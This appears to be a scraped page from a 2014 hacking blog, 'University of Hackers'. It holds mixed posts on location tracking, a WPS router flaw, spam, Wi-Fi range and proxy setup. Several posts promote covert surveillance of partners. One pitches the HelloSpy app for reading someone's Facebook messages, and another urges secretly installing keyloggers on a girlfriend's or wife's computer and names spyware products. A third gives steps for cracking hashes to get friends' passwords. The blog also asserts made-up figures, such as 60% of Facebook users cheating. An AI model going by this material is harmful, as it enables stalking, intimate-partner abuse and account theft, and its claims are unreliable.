Now, Google again being questioning over the tracking the user footprints through its service Google Maps, which can exploit your LIVE position, where are you? and along with the Live position it also save the record on daily basis and shows in a map through Red Dots

How you are being tracked?
It is only possible, if you are carrying your smartphone along with you and enabled to use the location services. Now a days it is not possible to walk around or go somewhere without a smartphone and sometimes for an application to keep working we need to enable our location services, so that’s it, everything starts from your setting in the smartphone.

How to check I am being tracked?
If you want to check yourself, about the tracking, so just sign in with your google account and go Here
You can yourself check your every move from Here. You just need to log in with the same account you use on your Smartphone, that’s it. The map will display all the records of everywhere you’ve been for the last day to month on your screen. Location is that key that can exploit your complete life, that means your privacy is in Google Hands, and I personally think we should not give away our privacy to one. So, if you are worried about your exploiting location, so you should change your privacy setting of your smartphone.
Google has also its one more service related to the Location, by which a user can authenticate another person to see his/her location, where actually he/she is? This service was criticised in 2009, but still it is in working mode.

How to disable the location?
Select Settings > Privacy > Location and then untick the box next to Use my location.
Share on Facebook

12/10/2014

New Security Flaw In Wi-Fi Routers Found, Opens Your Network To Hack In Seconds

If you thought that your expensive Wi-Fi access point or router was secure, you may need to think again after a flaw was found in at least two of the chipsets used by hardware manufacturers. Security is always on the top of the list of requirements for wireless networking these days, as it should be. With various ways of securing Wi-Fi access points out there, and with varying technical difficulty, there’s no reason to not keep your network safe.

Unless, of course, a security bug leaves your network wide open to hacking and a hack that takes no time at all to do no less. That’s the situation that an untold number of Wi-Fi routers find themselves in after security firm 0xcite announced its recent, worrying findings. According to the Swiss security firm, a flaw in the way some routers handle Wi-Fi Protected Setup, or WPS leaves them vulnerable to an attack that is not just relatively easy to do, but takes a second to carry out. The flaw itself lets attackers generate the required security PIN offline and ahead of time, meaning that gaining access is then simply a case of providing that PIN when asked by the router in question. 0xcite says that some Broadcom chipsets are affected, along with another as yet unnamed company who is currently rushing to plug the hole from its side. That should be a simple case of improving or simply adding PIN randomization, though we obviously don’t know quite as much about the underlying issue as the people that matter do. WPS is aimed at making it easy to connect devices to a Wi-Fi network, but it’s normally nice and secure. This hole will need fixing ASAP though, and with router firmware often rarely updated by end users, it’s anybody’s guess when we will be able to draw a line under the issue.
rss

11/10/2014

Facebook Messenger App Will Soon Let You Transfer Money To Friends

There is already quite the war going on amongst messaging apps on mobile, with Facebook, WhatsApp and Google amongst the players trying to become the way we communicate via text. If SMS is going to die, they are the ones who want to take over. Right now, Facebook Messenger is in the middle of a user backlash after it was unbundled from the Facebook app proper. It seems that isn’t going to stop Facebook from throwing new features at the app though, but the latest to leak out may not be what you would expect because while Apple is working to bring mobile payments to the iPhone, Facebook is doing the same via its Messenger app.

The news comes after Stanford computer science discovered the new, unannounced payment feature via the jailbreak tool Cycript. To drive home the discovery he took multiple screenshots to show off what he’d found and it certainly looks like Facebook is joining the mobile payment market as tainted by CEO and co-founder Mark Zuckerberg during the company’s Q2 earning call.

Speaking on the call, Zuckerberg went so far as to hunt that Facebook Messenger would be the home of the firm’s new payment system, saying that “over time there will be some overlap between Messenger and payments.
The payments piece will be a part of what will help drive the overall success and help people share with each other and interact with businesses.” From what we have seen of the screenshots. Facebook’s mobile payment system will work as you might expect, with multiple payment sources able to be added, though PayPal may or may not be on the list of supported options. Given the face Facebook hired PayPal’s former president David Marcus, we expect support to come at some point.

Mobile payments are sure to be big over the coming months, not least because Apple is entering the arena with Apple Pay We don’t know when Facebook will be launching its own competitor to Apple Pay, but if it’s already built into Messenger, we may not have to wait too long to try it out.
Share on Facebook

10/10/2014

Hack Facebook Messages In 5 Minutes

Facebook is used by all age groups. No matter who your targeted user is, you can bet they are visiting Social Networks can keep you informed about all the chats present on the target device. With HelloSpy you can tracking Facebook messages on the smartphone anytime, anywhere will and now you can Facebook messages everything but You need a Rooted android cell phone toTrack Facebook Conversation Chat Messages
Facebook online dominance is undeniable, you can hardly find a person who doesn't use them. Monitoring employees or kids would be incomplete without this tracking feature. Always know what they are writing and interfere if you detect any inappropriate communication.

Best Ways to Track Facebook Conversation Messages Online
Easy to use Tracking Facebook Messages Online is very easy to use. Once they are set up, you most likely will never have to touch your spouses mobile. All you do is sit back and view the tracking logs on any internet connected PC. HelloSpy gives free 2 days to use trial before you decide to buy it from play store or ios. HelloSpy is the best app to track someone facebook messages online.

How To Hack Into Someones Facebook Messages?
Today, 60% of Facebook users are cheating their loved ones, so we know that there is an option of linking your cell phone number with your account. In case, you can't Hack Facebook Account or Password. But You can Hack Someones Facebook Conversation Messages with HelloSpy App

Supported platforms for this feature
Android and Iphone

08/10/2014

Spy on Unfaithful Girlfriend/Wife

Do have a feeling that she is cheating on the Internet? Would you like to know for sure by monitoring what she is doing on her computer? Technically you would be spying on her PC, but you need to know. She might be doing work on her computer or she might be having an Internet fling. Could it ever become a real life infidelity? Yes, it could! If she is spending more time online than she is with you, it is time that you find out what she is doing online and who she is doing it with.
Internet infidelity is on the rise, and it threatens millions of relationships every day. Why let it threaten yours? Technology has made it so easy for people to talk to each other and see each other in real time. If she hasn’t been unfaithful physically, there is a chance that she could be if she is talking to another man online. Online relationships are very common, and innocent chats can turn into something more. Many times two people that have been chatting online arrange to meet each other face to face. This would put your relationship in a dilemma. Affairs happen easily and can be difficult to discontinue. It can be heart wrenching to sit in another room, or lie in bed alone and hear her on the Internet tapping away on the keyboard and not know what she is doing. What about when you are gone and she is at home on the computer? Why wait until something happens to your relationship to find out what she is doing while she is on the Internet?
Computer monitoring programs are available that allow you to find out what she is doing when she is on her computer. The programs monitor all online and offline activity on the computer that it is installed on. Yes, it is spying on her, but if you value your relationship, you can’t afford not to install a computer monitoring program. Installation isn’t difficult. All you need is ten minutes with her computer, and the ability to follow simple installation instructions. After installation, you are on your way to finding out what is really happening.
If she is being unfaithful in the cyber world, you will quickly find out about it. You have the right to know what is going on. A computer monitoring program is evidence that can’t be denied because it logs every keystroke and every action performed. Some people think that an online relationship with a complete stranger isn’t really cheating, but it is in a different way because it takes the love and companionship away from the other person in the relationship. There are many questions about online relationships. The answer lies in the perception of the person that is affected.
Sometimes an Internet relationship will go into a full blown real life relationship. Meetings will take place at hotel rooms or the other person’s place of residence. Some men feel threatened if his partner shares intimacies online with a stranger. Do you? Some men would rather turn the other cheek, close their eyes and not pay attention to what is happening. Do you want to know what is happening? If you do, try a computer monitoring program that will provide you with the answers you seek. The program runs invisibly in the background so she will never know that she is being monitored. Technology is evolving. The evolution is leading her to cheat using cell phone texting and sexting.
Some Recommended Computer Monitoring Programs:
KeyGhost
SpyAnywhere
SniperSpy
iSpyNOW
SpyBuddy
RealTime-Spy
WebWatcher
Note: Please read How to use a trail program/software for free before you buy any software.
Share on FB Share on Twitter

07/10/2014

How to Use Ravan for Cracking Password?

As we have discussed various method for breaking strong passwords through rainbow tools and many other software. So today we will learn how to crack any Md5 Sha1 Sha256 and Sha512 easily with Ravan tool.
Ravan is a javascript computing system which is used to crack hashes into simple text. To Hack your friends passwords your friend must have Internet connection on. Otherwise it won’t work. You don’t need to download any software or hack, just follow the instructions below.


How to use Ravan?

1.
* Go to http://www.andlabs.org/tools/ravan.html

* Enter the value of the hash that must be cracked
* Enter the value of the salt, if it is not a salted hash then leave it blank
* Enter the charset. Only these characters will be use in the brute force attack
* Select the hashing algorithm MD5 SHA1 SHA256 SHA512
* Select the position of the salt. clear-text+salt or salt+clear-text
* Hit Submit Hash
2.
If hash is successfully submitted, it would return a URL Now you just need to send this URL to all your friends and ask them to click the start button. The main page manages the cracking so it must not be closed or the cracking would fail. That is it. Once your friends click start they would be doing pieces of the work and submitting results back. The main page would constantly monitor the progress of the cracking process and manage it across all the workers. You would be able to see the stats throughout the process, once the hash is cracked the clear-text value is displayed.

Share on Facebook
Share on Twitter

How you are getting large number of spam mail? Know why

How you are getting large number of spam mail? Know why are you getting lot of spam mail to your inbox?
Do you know why it comes to your mail? The mistake is yours only. Because of you only you are getting larger number of spam. How you responsible for that? Go ahead to know what is your mistake.

Spam Mail Definition:


Spam mail also known as junk mail. Sending large number of identical message to numerous recipients . Advertisers, merchants sends large number of mail to recipients for advertising purpose using softwares and some websites.

How they get your email id?


They get your mail id because of your mistakes only.

Social Networking Sites:


Most of you use Social networking sites daily. I won't say using social networking sites is bad. But sending request or accepting stranger is one of the major reason for getting spam mail. Advertisers will gain your weakness. If you are blindly accepting the request means, spam mail will be definitely in your mail. Sometimes they get your phone number and send advertisement to your mobile or some other communication sources.

What you have to do?


Apply privacy setting for your contact information. Don't accept the request from strangers in order to attract you they may send you request like a girl.

Online Games and contests:


Some websites tell you that they will give prize if you win in the online game. This is also one of the reason for getting spam mail.

Job/Career websites:

Job offering websites is the major reason for getting spam mail. But some website sell your mail to Advertisers This will result in spam.

Forum:

Like i said for social networking site, in forum also you have to consider the privacy settings. Select Don't show mail and Don't receive mail from members so that you can avoid of getting spam mails.

Mail Searching:

Advertisers Spammers search for mail id in internet using some softwares like mail.com If you are webmaster, you may give contact us link with mailto:mailid@domain.com Spammers can find your mail ID if you give the mail ID plainly like this.
tips:
* Use 123 contact forms for hiding your mail id.
* Use mail Badge Image

Overall suggestion:

Use two mail id. One for contributing in online and other one for personal use only.
twitter twitter

How to Increase Wifi Signal Strength

A normal WiFi should be able to cover all of your home or office so that you can use it from anywhere and on any devices such as laptops and phones. Not often do you get to use the optimal signal strength of your wireless network. This could be due to various factors I’ve listed below.
Increase WiFi Speed
Follow these steps to improve, boost, extend or increase Wi-Fi router signal and range at home or work place, without spending anything.
Extend WiFi Signal Area with Better Placement of Router
One of the most important things to think when designing a wireless network is to decide where to keep the router. You would want all corners of your house or office covered so that people can use it from anywhere. For that, you have to check the optimal place for the router. To do this, draw a rough layout of your house on paper. See where and how many walls and other things act as obstructions.
If your router is placed in an inside room and you want to use it outside in the porch, you may not get the wireless signals as the waves are killed by all those walls and furniture etc. between the router and your porch.
Check out the above image to understand it better. The red dot is router and all rooms are marked with alphabets. You can see how the walls and placement create a problem. The layout also shows how to select optimal position for router. Just think of the entire coverage area you want and figure out what is the central position which allows proper flow of signals in all directions, to extend the WiFi network range.
Adjust Obstacles for Flow of Signal Strength
Other than wall, things like your almirahs, water coolers and mirrors etc. weakens and even kill the WiFi signals moving that way. Almirahs are mostly metals that may prevent signals from crossing over through the unit. Water dampens signals of 2.4GHz for some reasons. This is the usual frequency used by wireless routers and even other wireless things at your home. Mirrors have a special coating towards the back that absorb signals of that frequency 2.4GHz Just check out if they can be removed from the invisible straight line between your router and the place you wish to use a WiFi device. If yes, you can adjust the items to make it clearer and easier for the wireless signals to pass through. Breaking down walls will further ease signal flow but I won’t suggest doing that to increase signal range! Instead, we’ll talk about repeaters to provide for signal strength loss when they travel through walls.
Remove Other Wireless Devices
As said earlier, the WiFi signals travel at 2.4GHz I do not know exactly how, but some routers do provide an option of changing the frequency to 5GHz If you can do that "check your router settings in a browser" nothing can beat that. But if there is no option in the router, try to minimize wireless devices around the router and wireless device you are using on WiFi. Almost all household appliances including the wireless mouse, wireless printers, and even microwave ovens run at the said frequency of 2.4GHz. Since you need these devices and cannot get rid of them, just make sure there is minimum interference among all these smart appliances.
Omnidirectional vs Unidirectional Antennas
In the case of the first layout in the image above, if the antenna is omnidirectional, it is wasting half of your WiFi signals by sending them out of the house. In such cases, go for unidirectional antennas. You may combine unidirectional antennas with repeaters to get better WiFi signal strength in other rooms that lie on the other side of the direction set by unidirectional antennas.
Use Repeaters To Increase WiFi Range
Some people place the repeaters just at the point where the original wave frequency is very low. That setup, though fine, will not provide you with strong enough signals. Keep the repeaters in the zone and where the signal strengths are still a little strong. That way you can boost WiFi signals to extend its range.
Share on Facebook

What Is a Proxy, How to Setup a Proxy or How to Surf the Web Anonymously

A proxy acts as an intermediary between a HTTP client and HTTP Server. It receives all requests from the browser, and relays them to the server. Likewise, it receives all responses from the server, and relays them to the client. Proxies are used for a number of reasons such as to filter web content, to go around restrictions such as parental blocks, to screen downloads and uploads and to provide anonymity when surfing the internet.

Why Use a Proxy?
If you are wanting to surf the web anonymously then proxies can provide you with a means to hide your home IP address from the rest of the world. By connecting to the internet through proxies, the home IP address of your machine will not be shown but rather the IP of the Proxy server will be shown. This can provide you with more privacy then if you were simply connecting directly to the internet.
There are number of proxies that can provide you with service. You can find a list of these simply by typing Proxy List into any search engine. There are some proxies which are free and some which charge money, the choice is up to you but we have found that the paid proxies are more reliable, faster and more secure.
How to Setup a Proxy
Most internet browsers can be setup to run through proxies in just a matter of minutes.
Internet Explorer Proxy Settings
* Click Tools
* Click Internet Options
* Click the Connections Tab
* Click LAN settings
* Check the Use a proxy server for your LAN box
* Enter the IP Address of the proxy server and the Port Number
* Click OK
FireFox Proxy Settings
* Click the FireFox Button in the upper left corner
* Click Options
* Click Options in the new tab
* Click the Advanced Tab
* Click Settings
* Click Manual Proxy Settings
* In the HTTP Proxy Box enter the IP Address of the proxy server and the Port number
* Click OK
Google Chrome Proxy Settings
* Click the Customize and Control Button in upper right corner
* Click Under the Hood
* Click Change proxy settings
* Click LAN Settings
* Check the Use a proxy server for your LAN box
* Enter the IP Address of the Proxy Server and the Port Number
* Click OK
Safari Proxy Settings
* Click Safari
* Click Preferences
* Click Advanced
* Click Change Settings
* Check the Web Proxy HTTP box
* Enter the IP Address of the Proxy Server and the Port Number
* Click Apply Now
Proxy Detection
Are you truly hidden? Check your proxy detection here Here If your proxy is setup correctly you will see it’s IP address on the homepage and you may receive a message that a proxy was detected.
Share on Facebook
Share on Twitter

06/10/2014

Advertise Here And Unlock Your Dreams


Welcome to the advertisement section of University of Hackers. University of Hackers is one of the fastest growing and popular guide of hacking/penetration testing blog that discuss the information security, computer security and other IT related issues with different tools and tutorials.
University of Hackers is viewed by the thousands of readers daily, weekly and monthly, we encourage advertiser(s) to advertise their product and services with us. University of Hackers has currently following stats:
150,000+ page views per month
1000+81 Facebook fans (26-10-2014)
600+56 email subscribers
Visits from 166 countries
Your banner will be display in all the pages.

Advertisement Options:
We have different kinds of advertisement options like:
Ads placement.
Email Marketing.
Social Media Marketing And much more.
There are different places and ad size are available on this blog Contact Us for more detail.

Social Media Marketing:
Products & Services Review, We publish blog article to discuss your product and service, review article can give you more exposure because we share it to our email subscribers, social media channels and the daily visitors can also read it.
If you are interested to advertise at University of Hackers than kindly follow the LINK or mail us at:
universityofhackers@ gmail.com
johnelwin2004@ gmail.com
Good luck.